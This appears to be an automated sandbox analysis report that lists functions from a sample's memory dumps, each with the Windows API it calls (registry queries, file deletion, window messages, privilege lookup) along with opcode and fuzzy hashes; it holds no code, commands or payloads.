Opcode ID: 92713cddfa38a049832254710b6ab469a81c196bd1d970054a89774074a4b15f
Instruction ID: b5295d0af563ba15006c91723b4256ba32eb22a6cae0ce1f57ff9a347e6f5437
Opcode Fuzzy Hash: 92713cddfa38a049832254710b6ab469a81c196bd1d970054a89774074a4b15f
Instruction Fuzzy Hash: 83216FB65097845FE7228F25DC54B62BFA8EF06210F0884AAED85CB253D675E809C762

Uniqueness

Uniqueness Score: -1.00%

Function 00EEAE1A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,9716DC5B,00000000,00000000,00000000,00000000), ref: 00EEAE94

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6412c7df813e3d79f10d040c6d7f73fb77ad70c908fadaa6b302d5f54170b988
Instruction ID: e84f483c64ebe08c783d6707eae3a233bd650c880ef3d5e13a3524afa98fec17
Opcode Fuzzy Hash: 6412c7df813e3d79f10d040c6d7f73fb77ad70c908fadaa6b302d5f54170b988
Instruction Fuzzy Hash: C6218E71600348AFE721CE16DC84FA6FBECEF04710F08846AED45AB261D764F844CA72

Uniqueness

Uniqueness Score: -1.00%

Function 04FE1122, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E2C,9716DC5B,00000000,00000000,00000000,00000000), ref: 04FE1186

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 9f9d918e78a7da10e91c3a97803f31adc2742956b02a935537f34d1dcc839ea3
Instruction ID: 765fffae821bc5e26dd2ead6b8f371f025c82a189552ef53537d413d5e172160
Opcode Fuzzy Hash: 9f9d918e78a7da10e91c3a97803f31adc2742956b02a935537f34d1dcc839ea3
Instruction Fuzzy Hash: 3911AF72600304AFEB21CF66DD85F6ABBACEF04321F14846AED45CB242D675E405CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00EEB4ED, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 00EEB569

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: e04d3a7b08bf61c7642b013b78cfb7bff095b35c566e3299e8f138dd729b10fb
Instruction ID: b67916c353843d667c619ee55be1dd1f9a07a8d0846365dafb5f347b4dfcba4d
Opcode Fuzzy Hash: e04d3a7b08bf61c7642b013b78cfb7bff095b35c566e3299e8f138dd729b10fb
Instruction Fuzzy Hash: 37218EB15097849FDB228B15DC45B63BFE8EF16314F08809AED859B252D365E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04FE103A, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E2C,9716DC5B,00000000,00000000,00000000,00000000), ref: 04FE1096

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: f0f38b3970589294ae4025236f37fa9cef1096597af0ff1501ffcaf5b01fa25a
Instruction ID: b47feb85ec2d30c73b1fdb1c4dca1a3bb464e56d2f1a889205f36e79113d2d92
Opcode Fuzzy Hash: f0f38b3970589294ae4025236f37fa9cef1096597af0ff1501ffcaf5b01fa25a
Instruction Fuzzy Hash: DD11C472600344AFEB21CF6ADD85F6AFBA8EF44320F14846AEE458B245D674E405CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EEBEAD, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 00EEBF1B

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: e68bb581a850932b7c35e85114dfcf3598989f90a644990ed5c8c2ab1dc0ab18
Instruction ID: 6ac90c57aef1585cfb6ee9750b8e1d4768559c7474a7b1163617da13fa56101c
Opcode Fuzzy Hash: e68bb581a850932b7c35e85114dfcf3598989f90a644990ed5c8c2ab1dc0ab18
Instruction Fuzzy Hash: 4C2184725097C49FD7128B25DC85B52BFE4EF12314F0980DAED858F263D264E818CB72

Uniqueness

Uniqueness Score: -1.00%

Function 04FE053A, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04FE05B1

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7f7406949a94beebca50e4903a456488045b005148032e053597051c935057b2
Instruction ID: 6ed2e5fedc135eca6306480ded3b54d70d28dd69e24873e3ee4ab0e404f40d1e
Opcode Fuzzy Hash: 7f7406949a94beebca50e4903a456488045b005148032e053597051c935057b2
Instruction Fuzzy Hash: 7021CD724093C09FDB228B21DC50AA2BFB0EF17220F0D84DAEDC44F163D265A958CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EEA6BB, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EEA726

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: af21d12c9cd24031d1f8e7214697e715e08d8ea1ca8dfb22c8e2e021cac8a848
Instruction ID: 51d00603b05e681da1bdb7460f7fe0ea1a8ddd52a867be47378b1ee8cbc377f6
Opcode Fuzzy Hash: af21d12c9cd24031d1f8e7214697e715e08d8ea1ca8dfb22c8e2e021cac8a848
Instruction Fuzzy Hash: 0711A272409784AFDB228F55DC44B62FFF8EF4A310F08849EED858B152D275A418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04FE138C, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 04FE13E8

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 56f1ca9b318c6e589739e01231f99c330053360ef1e8f40c0c5c0733afed44be
Instruction ID: 4e4be26fde0ddbb0d77b4e31533c52f22f651ba641340859ae4a8e4555c143a5
Opcode Fuzzy Hash: 56f1ca9b318c6e589739e01231f99c330053360ef1e8f40c0c5c0733afed44be
Instruction Fuzzy Hash: 7311C4715093809FD712CF26DD84B52BFA8DF46220F0884EBED85CF252D275E848CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04FE1C9B, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04FE1D05

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 01d14da1aa78cba73f79556ad29375b57e585cbef1847c04370f65033ee10c6a
Instruction ID: 1941c4964dc1c3db02c017f835bf327fa550a24ef7641d9736f76260dfc7c707
Opcode Fuzzy Hash: 01d14da1aa78cba73f79556ad29375b57e585cbef1847c04370f65033ee10c6a
Instruction Fuzzy Hash: 7E11B272509384AFDB228F16DC45B52FFB4EF06324F0884DEED858B563C275A419CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04FE0CF2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 04FE0D3A

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c1639d7f87afd618331641a7c75d6c6a9abe7af2c4f931a167675377216d6299
Instruction ID: a1f5bdd8d12a70510bed79be1e35337f94a95dd96a4b8b7c694d3f9225fe13b5
Opcode Fuzzy Hash: c1639d7f87afd618331641a7c75d6c6a9abe7af2c4f931a167675377216d6299
Instruction Fuzzy Hash: 52116172A013059FDB60CF2AD885766FBE8EF04221F0884AADD49CB655EAB4F405CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EEABAC, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00EEAC06

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 6fed6fb1b56639cdf6b9b68045594161af7cb7f30cc983eeb031b13b843e4328
Instruction ID: 7df3a3fb96875f99c94c80e99ed235a0273dcff4a86864ddebcaef282945541c
Opcode Fuzzy Hash: 6fed6fb1b56639cdf6b9b68045594161af7cb7f30cc983eeb031b13b843e4328
Instruction Fuzzy Hash: 18117C324097849FDB21CF15DC85B52FFF4EF46320F08849AEE858B262C375A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04FE1242, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 04FE1292

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 728dddeb038485ba45520139327e6910cc26b94eeb8516f95d4d0a96b428d86c
Instruction ID: c5a5e9fb68090e65dff4b7d2c68dd707ad6fe104c593f4bd1fe581899626a425
Opcode Fuzzy Hash: 728dddeb038485ba45520139327e6910cc26b94eeb8516f95d4d0a96b428d86c
Instruction Fuzzy Hash: 5301B171500600ABD710DF1ADC85B26FBA8FB89B20F14812AED088B641D231B915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 04FE13AE, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 04FE13E8

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5f176453dcd7d1e804668e32b2a76dada249b5834c2103d36afcd60fcc833be4
Instruction ID: 63277f195b77b72338bf3d62f75a5505400bc3637ff70fb3ea81bf7363dc371f
Opcode Fuzzy Hash: 5f176453dcd7d1e804668e32b2a76dada249b5834c2103d36afcd60fcc833be4
Instruction Fuzzy Hash: 96019E72A003448FDB20CF6BD985766FBD8EF01321F0884AADD49CB746E275E445CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00EEA42A, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00EEA480

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 80b124e68ef703135b59789f63c3392ab162878bcdea31578e8a0608b0abcc6f
Instruction ID: 2fa7078106c76658755ffad04015d7826842b30d70646178b8897060bd8a005a
Opcode Fuzzy Hash: 80b124e68ef703135b59789f63c3392ab162878bcdea31578e8a0608b0abcc6f
Instruction Fuzzy Hash: 58115E754093C49FD7128F15DC88B52FFA4EF46324F0980EEED858F262D279A948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EEB51E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 00EEB569

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: f99cf3f089dbb11ebdd131d544fc8283f28ffdc561cac2836b8cec700d75e4eb
Instruction ID: 09f6b0c83a5907c9c7f11f96bfb750f4f5d79ce647b6a35f9069363986c521fe
Opcode Fuzzy Hash: f99cf3f089dbb11ebdd131d544fc8283f28ffdc561cac2836b8cec700d75e4eb
Instruction Fuzzy Hash: F30192716007448FDB60CF1AD885B53FBE8EF14720F088499DD459B655D374E818CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EEA6E2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EEA726

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 773dd2f32150aa50d2310efeb80e4aff747ce677513b2843b765e57b720b24be
Instruction ID: 8a9534bcb057461af995b02ac328df189be7a08ee7fdc2eaf3a7bbdaf4d6ccbd
Opcode Fuzzy Hash: 773dd2f32150aa50d2310efeb80e4aff747ce677513b2843b765e57b720b24be
Instruction Fuzzy Hash: 4D015B324007449FDB21CF56D944B56FFE4EF08320F0888AEDE895A616D375A424DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EEBEDE, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 00EEBF1B

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: b4085572d69d5e39e3c4f1c3aa9fc6285ddc620b7bddd3a4867fc65eb1deb9b8
Instruction ID: e7acabbb160c433b245d82d259c1f9e366539c55eee4f2568ae3c0b32307248b
Opcode Fuzzy Hash: b4085572d69d5e39e3c4f1c3aa9fc6285ddc620b7bddd3a4867fc65eb1deb9b8
Instruction Fuzzy Hash: 520171756006448FDB208E1BDC85766FB94EF04720F08C0AADD499B756D375E818CEB2

Uniqueness

Uniqueness Score: -1.00%

Function 00EEA2F6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNELBASE(?,00000E2C,?,?), ref: 00EEA346

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: b0b46b4a684abe8fbb7ad062b628a16271305b87bae2ee260523a1292ef83c3f
Instruction ID: a511e3d02cb97572d2e3df63ac9f644d49f9141f7888e4b2743e4903a86551c8
Opcode Fuzzy Hash: b0b46b4a684abe8fbb7ad062b628a16271305b87bae2ee260523a1292ef83c3f
Instruction Fuzzy Hash: 7101A271500604ABD614DF1ADC86B26FBE8FB89B20F14815AED084B741D271F516CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 04FE1CCA, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04FE1D05

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c82eab2c8a29e9ce18e3bd7b2bd45f4389c57027d44db9f2bb8ef4f9a25de51c
Instruction ID: 97677b1276aab8c8c1d85a16238b76cc00662eea6e95976a10c036c79ed383f3
Opcode Fuzzy Hash: c82eab2c8a29e9ce18e3bd7b2bd45f4389c57027d44db9f2bb8ef4f9a25de51c
Instruction Fuzzy Hash: 4401B132A003009FDB218F17D944B65FBA4EF08321F08C4AEDD458B651D375E458DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 04FE0576, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04FE05B1

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9e031d45a68b24ed38de998d8782cb0601429e197c7a82e5219707150d3be960
Instruction ID: b0fe76f0b5d2a52f7be65328fce838e8d98b588573d8f8bacfa289993297cf06
Opcode Fuzzy Hash: 9e031d45a68b24ed38de998d8782cb0601429e197c7a82e5219707150d3be960
Instruction Fuzzy Hash: 69018F329003049FDB208F56D884B26FFA0EF05321F08C49ADD850B616E7B5E419DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00EEABCE, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00EEAC06

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: bd74a662dac2496dc3e19eb398f86ca3c3d3679bc1cfdf60a40d07835c6101a6
Instruction ID: 40d52e4e689e295e4a7dba9cb2c6f23219d082ddbee6a26c3f9acec8ab49498f
Opcode Fuzzy Hash: bd74a662dac2496dc3e19eb398f86ca3c3d3679bc1cfdf60a40d07835c6101a6
Instruction Fuzzy Hash: 0A018B315006888FDB208F06D884751FBA4EF04320F18C4AADE460B656D275B418DAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00EEA44E, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00EEA480

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 14ec993c26260a7e0bcb969530be70a452832f9e7d4c781797499f0dee8c25f7
Instruction ID: 409ae6bd95dbd1dec758a9305551fd6083f562a930847702e17feeddd90a9c85
Opcode Fuzzy Hash: 14ec993c26260a7e0bcb969530be70a452832f9e7d4c781797499f0dee8c25f7
Instruction Fuzzy Hash: B3F0A4355043848FDB208F06D888761FFD4EF04320F1CC0AEDD455B656E2B9B404CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 04DB6613, Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

W0q^, xrefs: 04DB69AD, 04DB69B2

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: W0q^
API String ID: 0-3240669060
Opcode ID: b436c25a1583e8ba2fdba4024d9da96f11d42f486b8f4b13da901087ae2a45c0
Instruction ID: 5fe587c6e4b5ef1249edca99279656b9a669807a722b7f3fc496419e42bcec48
Opcode Fuzzy Hash: b436c25a1583e8ba2fdba4024d9da96f11d42f486b8f4b13da901087ae2a45c0
Instruction Fuzzy Hash: BFA18D30B00215CBDB24DF69C954BADB7B2BF88700F248599D486AB294DF34ED96CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04DB692E, Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

W0q^, xrefs: 04DB69AD, 04DB69B2

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: W0q^
API String ID: 0-3240669060
Opcode ID: c94c794ad0fad12f4536817c87985f9f79aa8491b1414ec2922a3112321e1eea
Instruction ID: 9858e0b532c4bffeb8e124e028df221f2a6df1463bdd0c449175b231eae6a905
Opcode Fuzzy Hash: c94c794ad0fad12f4536817c87985f9f79aa8491b1414ec2922a3112321e1eea
Instruction Fuzzy Hash: E6113D30704541CFDB24AB65D96477C77B3BB88744F50805AC1839B698EF74EC56CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DB695C, Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

W0q^, xrefs: 04DB69AD, 04DB69B2

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: W0q^
API String ID: 0-3240669060
Opcode ID: 89cda4ce3f25568ae6b8deab7e7102e904eeff0e10e7a68f2cb42eae81eb662f
Instruction ID: 11203560fa6730ba39503d861fde179c883cbca3f745595cf60072307a0c26e8
Opcode Fuzzy Hash: 89cda4ce3f25568ae6b8deab7e7102e904eeff0e10e7a68f2cb42eae81eb662f
Instruction Fuzzy Hash: C9117030700540CFDB24AB76D91477C76A3BB88744F60801AC0839B298EF78DC96CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04DB697E, Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

W0q^, xrefs: 04DB69AD, 04DB69B2

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: W0q^
API String ID: 0-3240669060
Opcode ID: a7df9e1b1ba562319081d91220b0a94bfb1bfa77de161ad1ef680fe694698141
Instruction ID: 26882255d71c47309bd44e0068c81ed3bffd657e12e312d5bf1afe5efb20331f
Opcode Fuzzy Hash: a7df9e1b1ba562319081d91220b0a94bfb1bfa77de161ad1ef680fe694698141
Instruction Fuzzy Hash: D5014030700644CFDB24AB75C95477C66A7BB88744F64C01AD0879B298EF78D896CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DB70E8, Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f470b92ca1697f0e71596bad07da530722216e1d1624292f8a125af0f30655
Instruction ID: 312a2dbd80e65e59d25babf93d154fe45cc09cc2bde598c1106ce6298e895cbd
Opcode Fuzzy Hash: 39f470b92ca1697f0e71596bad07da530722216e1d1624292f8a125af0f30655
Instruction Fuzzy Hash: BBB1E531B041598FCB05DBBDC890AAEBBF6BFC9300B15856AE556DB391DA30EC05C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 04DB5171, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0145dbbd16d45b67e51a7524ea220c621a4d4b3481f53f5b85db55b5967aa75b
Instruction ID: 70aa687f55dd2c3f5a159b70ac38ddb40cefa9f99ff0e61a7604254c338f6337
Opcode Fuzzy Hash: 0145dbbd16d45b67e51a7524ea220c621a4d4b3481f53f5b85db55b5967aa75b
Instruction Fuzzy Hash: 1981C471A09754E7E701AF10F46839ABBE1FB84348F1109A9E9C7922A1FE35EC5487C3

Uniqueness

Uniqueness Score: -1.00%

Function 04DB7428, Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b7c2443f9e6867d18b9d5effbdb3fe2dd2297d6dee6f400e28af545a6793b6
Instruction ID: 3856b5028465ab004cec1714b826e7410e0910f7b83a46b684f98b27bf134f8c
Opcode Fuzzy Hash: 55b7c2443f9e6867d18b9d5effbdb3fe2dd2297d6dee6f400e28af545a6793b6
Instruction Fuzzy Hash: D771F430704255CFC799AB7A805452976E7BF8A30532484BDD4ABDB3A1DE32DC09EB92

Uniqueness

Uniqueness Score: -1.00%

Function 04DB82E8, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0727e839ad9ec41f7d4ef9af9650f12fbd3ad9797dcaa193e34be716600c246a
Instruction ID: 2f25336e28c0ad2cdd0293ce8bfb39f239ef837b33e9d8e2833b1d873a9e79ca
Opcode Fuzzy Hash: 0727e839ad9ec41f7d4ef9af9650f12fbd3ad9797dcaa193e34be716600c246a
Instruction Fuzzy Hash: 6F514F317043489FC701EFA5CC60BAE7BA9AF86310F54809EE945DB286CE35ED06D795

Uniqueness

Uniqueness Score: -1.00%

Function 00EFB01D, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.669394942.0000000000EF2000.00000040.00000001.sdmp, Offset: 00EF2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c47ae33d6e08b5eba6d9838ead3205ff13ccfc9a6feaad64f8433c15dd0a8503
Instruction ID: f2316b0eadd62619d59fb7808656e57c2ab2ceafeae28e644bb8875d38b60dd6
Opcode Fuzzy Hash: c47ae33d6e08b5eba6d9838ead3205ff13ccfc9a6feaad64f8433c15dd0a8503
Instruction Fuzzy Hash: C431A0B6508340AFD311CF19EC40A57FFE8EB89660F18C96EFD4997211D275E414CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EFADF7, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.669394942.0000000000EF2000.00000040.00000001.sdmp, Offset: 00EF2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce697a265e696332ced482ffb7455adf2fff4e4d6a84946f9931181bdc4b6278
Instruction ID: 747de0f3ed86e0e392043161aaa15424b88bb5bf957a95628342830352c38e41
Opcode Fuzzy Hash: ce697a265e696332ced482ffb7455adf2fff4e4d6a84946f9931181bdc4b6278
Instruction Fuzzy Hash: 01319FB6508340AFD310CF15EC45A57FFE8EB89630F18C86EFD489B211D275A914CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EFABC6, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.669394942.0000000000EF2000.00000040.00000001.sdmp, Offset: 00EF2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e78dd1b82c48025412fa814f6842b584b7224d44a9e947a3dd7be68007d584a
Instruction ID: f6ed907884e3e5ed96b7d5f8b129f4534bb646c51644f7af92257087d74a754d
Opcode Fuzzy Hash: 2e78dd1b82c48025412fa814f6842b584b7224d44a9e947a3dd7be68007d584a
Instruction Fuzzy Hash: 15319CB6508340AFD710CF55EC41A57FFE8EB89620F08C86EFD889B211D275E814CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04DB70D8, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d47211f09f83f0a2d962e06e0347dd4915e86394daa9039bd54d0bda9385877
Instruction ID: 685e05ead507c4a310233342793279eb81fb7a8f44ad4495cc371f7c6973d245
Opcode Fuzzy Hash: 2d47211f09f83f0a2d962e06e0347dd4915e86394daa9039bd54d0bda9385877
Instruction Fuzzy Hash: 48317175A001199FDB01CBB8CC50ADEBBF6FF89300F158565D605AB665DA70E841CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EFA773, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.669394942.0000000000EF2000.00000040.00000001.sdmp, Offset: 00EF2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d30ef91f8b2c90e968a6178f29c7d78734a23311caf24867d7ff6803550e23
Instruction ID: 3b2c399e4587d8eb436878f8787c8b9d81ec2145bbb719d1e9c9b9fde7f07765
Opcode Fuzzy Hash: 17d30ef91f8b2c90e968a6178f29c7d78734a23311caf24867d7ff6803550e23
Instruction Fuzzy Hash: 4F210576508344AFD7218F159C41A53FFE8EB86670F18C49FFD489B212D276B414CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04DB4EE1, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a944daa27ccc2bea940c62904470d34a62a998d80c2b9944e5e188feb5bc60
Instruction ID: a5b418d10109696ecf37df7ed5be9b394817d254cfb405903bb78aa001a53f9f
Opcode Fuzzy Hash: 54a944daa27ccc2bea940c62904470d34a62a998d80c2b9944e5e188feb5bc60
Instruction Fuzzy Hash: D9218231709544CFD701AB2AA4186BE2AA2EBC8344F40406BF2C3DB396DE68EC55D7D3

Uniqueness

Uniqueness Score: -1.00%

